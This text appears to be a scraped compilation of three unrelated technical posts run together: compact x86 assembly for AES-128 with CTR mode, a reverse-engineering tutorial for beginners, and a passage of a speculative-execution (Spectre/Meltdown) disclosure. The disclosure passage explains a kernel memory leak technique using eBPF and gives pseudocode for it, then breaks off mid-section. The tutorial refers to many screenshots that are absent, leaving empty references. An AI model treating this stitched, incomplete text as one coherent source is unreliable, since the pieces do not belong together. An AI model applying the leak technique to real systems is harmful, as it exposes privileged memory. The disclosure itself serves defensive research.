EAX will hold Rcon value declared as c. ECX will be used exclusively for loops, and EDX is a spare register for loops which require an index starting position of zero. There’s a reason to prefer EAX than other registers. Byte comparisons are only 2 bytes for AL, while 3 for others.

```// 2 vs 3 bytes
/* 0001 */ "\x3c\x6c"             /* cmp al, 0x6c         */
/* 0003 */ "\x80\xfb\x6c"         /* cmp bl, 0x6c         */
/* 0006 */ "\x80\xf9\x6c"         /* cmp cl, 0x6c         */
/* 0009 */ "\x80\xfa\x6c"         /* cmp dl, 0x6c         */
```

In addition to this, one operation requires saving EAX in another register, which only requires 1 byte with XCHG. Other registers would require 2 bytes

```// 1 vs 2 bytes
/* 0001 */ "\x92"                 /* xchg edx, eax        */
/* 0002 */ "\x87\xd3"             /* xchg ebx, edx        */
```

Setting EAX to 1, our loop counter ECX to 4, and EDX to 0 can be accomplished in a variety of ways requiring only 7 bytes. The alternative for setting EAX here would be : XOR EAX, EAX; INC EAX

```// 7 bytes
/* 0001 */ "\x6a\x01"             /* push 0x1             */
/* 0003 */ "\x58"                 /* pop eax              */
/* 0004 */ "\x6a\x04"             /* push 0x4             */
/* 0006 */ "\x59"                 /* pop ecx              */
/* 0007 */ "\x99"                 /* cdq                  */
```

Another way …

```// 7 bytes
/* 0001 */ "\x31\xc9"             /* xor ecx, ecx         */
/* 0003 */ "\xf7\xe1"             /* mul ecx              */
/* 0005 */ "\x40"                 /* inc eax              */
/* 0006 */ "\xb1\x04"             /* mov cl, 0x4          */
```

And another..

```// 7 bytes
/* 0000 */ "\x6a\x01"             /* push 0x1             */
/* 0002 */ "\x58"                 /* pop eax              */
/* 0003 */ "\x99"                 /* cdq                  */
/* 0004 */ "\x6b\xc8\x04"         /* imul ecx, eax, 0x4   */
```

ESI will point to s which contains our plain text and master key. ESI is normally reserved for read operations. We can load a byte with LODS into AL/EAX, and move values from ESI to EDI using MOVS.

Typically we see stack allocation using ADD or SUB, and sometimes (very rarely) using ENTER. This implementation only requires 32-bytes of stack space, and PUSHAD which saves 8 general purpose registers on the stack is exactly 32-bytes of memory, executed in 1 byte opcode.

To illustrate why it makes more sense to use PUSHAD/POPAD instead of ADD/SUB or ENTER/LEAVE, the following are x86 opcodes generated by assembler.

```// 5 bytes
/* 0000 */ "\xc8\x20\x00\x00" /* enter 0x20, 0x0 */
/* 0004 */ "\xc9"             /* leave           */

// 6 bytes
/* 0000 */ "\x83\xec\x20"     /* sub esp, 0x20   */
/* 0003 */ "\x83\xc4\x20"     /* add esp, 0x20   */

// 2 bytes
/* 0000 */ "\x60"             /* pushad          */
/* 0001 */ "\x61"             /* popad           */
```

Obviously the 2-byte example is better here, but once you require more than 96-bytes, usually ADD/SUB in combination with a register is the better option.

```; *****************************
; void E(void *s);
; *****************************
_E:
xor    ecx, ecx           ; ecx = 0
mul    ecx                ; eax = 0, edx = 0
inc    eax                ; c = 1
mov    cl, 4
; F(8)x[i]=((W*)s)[i];
mov    esi, [esp+64+4]    ; esi = s
mov    edi, esp
add    ecx, ecx           ; copy state + master key to stack
rep    movsd
```

### Multiplication

A pointer to this function is stored in EBP, and there are three reasons to use EBP over other registers:

1. EBP has no 8-bit registers, so we can’t use it for any 8-bit operations.
2. Indirect memory access requires 1 byte more for index zero.
3. The only instructions that use EBP are ENTER and LEAVE.
```// 2 vs 3 bytes for indirect access
/* 0001 */ "\x8b\x5d\x00"         /* mov ebx, [ebp]       */
/* 0004 */ "\x8b\x1e"             /* mov ebx, [esi]       */
```

When writing compact code, EBP is useful only as a temporary register or pointer to some function.

```; *****************************
; Multiplication over GF(2**8)
; *****************************
push   ecx                ; save ecx
mov    cl, 4              ; 4 bytes
add    al, al             ; al <<= 1
jnc    \$+4                ;
xor    al, 27             ;
ror    eax, 8             ; rotate for next byte
loop   \$-9                ;
pop    ecx                ; restore ecx
ret
pop    ebp
```

### SubByte

In the SubBytes step, each byte $a_{i,j}$ in the state matrix is replaced with $S(a_{i,j})$ using an 8-bit substitution box. The S-box is derived from the multiplicative inverse over $GF(2^8)$, and we can implement SubByte purely using code.

```; *****************************
; B SubByte(B x)
; *****************************
sub_byte:
test   al, al            ; if(x){
jz     sb_l6
xchg   eax, edx
mov    cl, -1            ; i=255
; for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
sb_l0:
mov    al, 1             ; y=1
sb_l1:
test   ah, ah            ; !c
jnz    sb_l2
cmp    al, dl            ; y!=x
setz   ah
jz     sb_l0
sb_l2:
mov    dh, al            ; y^=M(y)
call   ebp               ;
xor    al, dh
loop   sb_l1             ; --i
; F(4)x^=y=(y<<1)|(y>>7);
mov    dl, al            ; dl=y
mov    cl, 4             ; i=4
sb_l5:
rol    dl, 1             ; y=R(y,1)
xor    al, dl            ; x^=y
loop   sb_l5             ; i--
sb_l6:
xor    al, 99            ; return x^99
mov    [esp+28], al
ret
```

The state matrix is combined with a subkey using the bitwise XOR operation. This step known as Key Whitening was inspired by the mathematician Ron Rivest, who in 1984 applied a similar technique to the Data Encryption Standard (DES) and called it DESX.

```; *****************************
; *****************************
; F(4)s[i]=x[i]^k[i];
xchg   esi, edi           ; swap x and s
xor_key:
lodsd                     ; eax = x[i]
xor    eax, [edi+16]      ; eax ^= k[i]
stosd                     ; s[i] = eax
loop   xor_key
```

There are various cryptographic attacks possible against AES without this small, but important step. It protects against the Slide Attack, first described in 1999 by David Wagner and Alex Biryukov. Without different round constants to generate round keys, all the round keys will be the same.

```; *****************************
; *****************************
; *k^=c; c=M(c);
xor    [esi+16], al
call   ebp
```

### ExpandRoundKey

The operation to expand the master key into subkeys for each round of encryption isn’t normally in-lined. To boost performance, these round keys are precomputed before the encryption process since you would only waste CPU cycles repeating the same computation which is unnecessary.

Compacting the AES code into a single call requires in-lining the key expansion operation. The C code here is not directly translated into x86 assembly, but the assembly does produce the same result.

```; ***************************
; ExpandRoundKey
; ***************************
; F(4)w<<=8,w|=S(((B*)k)[15-i]);w=R(w,8);F(4)w=k[i]^=w;
mov    eax, [esi+3*4]    ; w=k[3]
ror    eax, 8            ; w=R(w,8)
exp_l1:
call   S                 ; w=S(w)
ror    eax, 8            ; w=R(w,8);
loop   exp_l1
mov    cl, 4
exp_l2:
xor    [esi], eax        ; k[i]^=w
lodsd                    ; w=k[i]
loop   exp_l2
```

### Combining the steps

An earlier version of the code used separate AddRoundKeyAddRoundConstant, and ExpandRoundKey, but since these steps all relate to using and updating the round key, the 3 steps are combined in order to reduce the number of loops, thus shaving off a few bytes.

```; *****************************
; *****************************
; w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
; w=R(w,8)^c;F(4)w=k[i]^=w;
xchg   eax, edx
xchg   esi, edi
mov    eax, [esi+16+12]  ; w=R(k[3],8);
ror    eax, 8
xor_key:
mov    ebx, [esi+16]     ; t=k[i];
xor    [esi], ebx        ; x[i]^=t;
movsd                    ; s[i]=x[i];
; w=(w&-256)|S(w)
call   sub_byte          ; al=S(al);
ror    eax, 8            ; w=R(w,8);
loop   xor_key
; w=R(w,8)^c;
xor    eax, edx          ; w^=c;
; F(4)w=k[i]^=w;
mov    cl, 4
exp_key:
xor    [esi], eax        ; k[i]^=w;
lodsd                    ; w=k[i];
loop   exp_key
```

### Shifting Rows

ShiftRows cyclically shifts the bytes in each row of the state matrix by a certain offset. The first row is left unchanged. Each byte of the second row is shifted one to the left, with the third and fourth rows shifted by two and three respectively.

Because it doesn’t matter about the order of SubBytes and ShiftRows, they’re combined in one loop.

```; ***************************
; ShiftRows and SubBytes
; ***************************
; F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(((B*)s)[i]);
mov    cl, 16
shift_rows:
lodsb                    ; al = S(s[i])
call   sub_byte
push   edx
mov    ebx, edx          ; ebx = i%4
and    ebx, 3            ;
shr    edx, 2            ; (i/4 - ebx) % 4
sub    edx, ebx          ;
and    edx, 3            ;
lea    ebx, [ebx+edx*4]  ; ebx = (ebx+edx*4)
mov    [edi+ebx], al     ; x[ebx] = al
pop    edx
inc    edx
loop   shift_rows
```

### Mixing Columns

The MixColumns transformation along with ShiftRows are the main source of diffusion. Each column is treated as a four-term polynomial $b(x)=b_{3}x^{3}+b_{2}x^{2}+b_{1}x+b_{0}$, where the coefficients are elements over ${GF} (2^{8})$, and is then multiplied modulo $x^{4}+1$ with a fixed polynomial $a(x)=3x^{3}+x^{2}+x+2$

```; *****************************
; MixColumns
; *****************************
; F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
mix_cols:
mov    eax, [edi]        ; w0 = x[i];
mov    ebx, eax          ; w1 = w0;
ror    eax, 8            ; w0 = R(w0,8);
mov    edx, eax          ; w2 = w0;
xor    eax, ebx          ; w0^= w1;
call   ebp               ; w0 = M(w0);
xor    eax, edx          ; w0^= w2;
ror    ebx, 16           ; w1 = R(w1,16);
xor    eax, ebx          ; w0^= w1;
ror    ebx, 8            ; w1 = R(w1,8);
xor    eax, ebx          ; w0^= w1;
stosd                    ; x[i] = w0;
loop   mix_cols
jmp    enc_main
```

### Counter Mode (CTR)

Block ciphers should never be used in Electronic Code Book (ECB) mode, and the ECB Penguin illustrates why.

As you can see, blocks of the same data using the same key result in the exact same ciphertexts, which is why modes of encryption were invented. Galois/Counter Mode (GCM) is authenticated encryption which uses Counter (CTR) mode to provide confidentiality.

The concept of CTR mode which turns a block cipher into a stream cipher was first proposed by Whitfield Diffie and Martin Hellman in their 1979 publication, Privacy and Authentication: An Introduction to Cryptography.

CTR mode works by encrypting a nonce and counter, then using the ciphertext to encrypt our plain text using a simple XOR operation. Since AES encrypts 16-byte blocks, a counter can be 8-bytes, and a nonce 8-bytes.

The following is a very simple implementation of this mode using the AES-128 implementation.

```// encrypt using Counter (CTR) mode
void encrypt(W len, B *ctr, B *in, B *key){
W i,r;
B t[32];

// copy master key to local buffer
F(16)t[i+16]=key[i];

while(len){
// copy counter+nonce to local buffer
F(16)t[i]=ctr[i];

// encrypt t
E(t);

// XOR plaintext with ciphertext
r=len>16?16:len;
F(r)in[i]^=t[i];

// update length + position
len-=r;in+=r;

// update counter
for(i=15;i>=0;i--)
if(++ctr[i])break;
}
}
```

In assembly

```; void encrypt(W len, B *ctr, B *in, B *key)
_encrypt:
lea    esi,[esp+32+4]
lodsd
xchg   eax, ecx          ; ecx = len
lodsd
xchg   eax, ebp          ; ebp = ctr
lodsd
xchg   eax, edx          ; edx = in
lodsd
xchg   esi, eax          ; esi = key
; copy master key to local buffer
; F(16)t[i+16]=key[i];
lea    edi, [esp+16]     ; edi = &t[16]
movsd
movsd
movsd
movsd
aes_l0:
xor    eax, eax
jecxz  aes_l3            ; while(len){
; copy counter+nonce to local buffer
; F(16)t[i]=ctr[i];
mov    edi, esp          ; edi = t
mov    esi, ebp          ; esi = ctr
push   edi
movsd
movsd
movsd
movsd
; encrypt t
call   _E                ; E(t)
pop    edi
aes_l1:
; xor plaintext with ciphertext
; r=len>16?16:len;
; F(r)in[i]^=t[i];
mov    bl, [edi+eax]     ;
xor    [edx], bl         ; *in++^=t[i];
inc    edx               ;
inc    eax               ; i++
cmp    al, 16            ;
loopne aes_l1            ; while(i!=16 && --ecx!=0)
; update counter
xchg   eax, ecx          ;
mov    cl, 16
aes_l2:
inc    byte[ebp+ecx-1]   ;
loopz  aes_l2            ; while(++c[i]==0 && --ecx!=0)
xchg   eax, ecx
jmp    aes_l0
aes_l3:
ret
```

### Summary

The final assembly code for ECB mode is 205 bytes, and 272 for CTR mode.

Check sources here.

## Reverse Engineering Basic Programming Concepts

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

### Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

1. Variable Initiation
2. Basic Output
3. Mathematical Operations
4. Functions
5. Loops (For loop / While loop)
6. Conditional Statements (IF Statement / Switch Statement)
7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.

### Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

1. a string
2. an int
3. a boolean
4. a char
5. a double
6. a float
7. a char array

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

As you can see, initiating a string requires a call to a built in function for initiation.

### Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Now, let’s take a look at the assembly:

First, the string literal:

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

### Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

2. Subtraction
3. Multiplication
4. Division
5. Bitwise AND
6. Bitwise OR
7. Bitwise XOR
8. Bitwise NOT
9. Bitwise Right-Shift
10. Bitwise Left-Shift

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

We subtract using the ‘sub’ opcode:

We multiply using the ‘imul’ opcode:

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

We perform the Bitwise AND using the ‘and’ opcode:

We perform the Bitwise OR using the ‘or’ opcode:

We perform the Bitwise XOR using the ‘xor’ opcode:

We perform the Bitwise NOT using the ‘not’ opcode:

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

### Function Calls

In this section, we’ll be looking at 3 different types of functions:

1. a basic void function
2. a function that returns an integer
3. a function that takes in parameters

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

### Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

### If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

### Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

### User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

## AMD ARM Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

So far, there are three known variants of the issue:

• Variant 1: bounds check bypass (CVE-2017-5753)
• Variant 2: branch target injection (CVE-2017-5715)
• Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

During the course of our research, we developed the following proofs of concept (PoCs):

1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the «Literature» section.

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

The PoC code and the writeups that we sent to the CPU vendors are available here:https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

# Tested Processors

• Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
• AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
• AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
• An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

# Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

# Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

• Intel Haswell Xeon CPU, eBPF JIT is off (default state)
• Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
• AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

## Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

In section 2.3.5.2 («L1 DCache»):

[…]
• Be carried out speculatively, before preceding branches are resolved.
• Take cache misses out of order and in an overlapped manner.

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors»):

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = …;
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
…
}
However, in the following code sample, there’s an issue. If arr1->length, arr2->data[0x200] andarr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

• start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = …; /* small array */
struct array *arr2 = …; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = …;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
unsigned long index2 = ((value&1)*0x100)+0x200;
if (index2 < arr2->length) {
unsigned char value2 = arr2->data[index2];
}
}

After the execution has been returned to the non-speculative path because the processor has noticed thatuntrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] andarr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 — which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

## Attacking the kernel

This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

• either interpreted by an in-kernel bytecode interpreter
• or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

Whether the JIT engine is enabled depends on a run-time configuration setting — but at least on the tested Intel processor, the attack works independent of that setting.

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

eBPF’s data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn’t be a precondition in principle).

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array’s length to be slow on other physical CPU cores (intentional false sharing).

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling throughprog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

This program reads 8-byte-aligned 64-bit values from an eBPF data array «victim_map» at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_mapthat causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.

# Variant 2: Branch target injection

This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian’s distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.

## Basics

